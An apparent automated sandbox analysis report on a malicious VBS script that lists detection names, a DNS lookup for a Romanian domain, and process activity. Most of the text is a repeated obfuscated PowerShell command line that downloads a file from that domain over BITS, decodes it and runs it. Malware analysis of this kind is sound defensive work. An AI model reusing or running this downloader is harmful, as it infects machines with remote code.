Svmninge.vbs| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6401 | July 19, 2023, 9:02 a.m. | July 19, 2023, 9:04 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
2752
-
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.taramulalbinelor.ro |
CNAME
taramulalbinelor.ro
|
31.14.23.109 |
Suricata Alerts
Suricata TLS
No Suricata TLS
| file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
| cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" |
| cmdline | powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" |
| wmi | select * from win32_process where ProcessId=2752 |
| wmi | Select * from Win32_Service |
| Cynet | Malicious (score: 99) |
| Kaspersky | HEUR:Trojan.VBS.SAgent.gen |
| Avira | VBS/Agent.bpv |
| ZoneAlarm | HEUR:Trojan.VBS.SAgent.gen |
| Microsoft | Trojan:Script/Wacatac.H!ml |
| parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" | ||||||
| parent_process | wscript.exe | martian_process | powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}" | ||||||
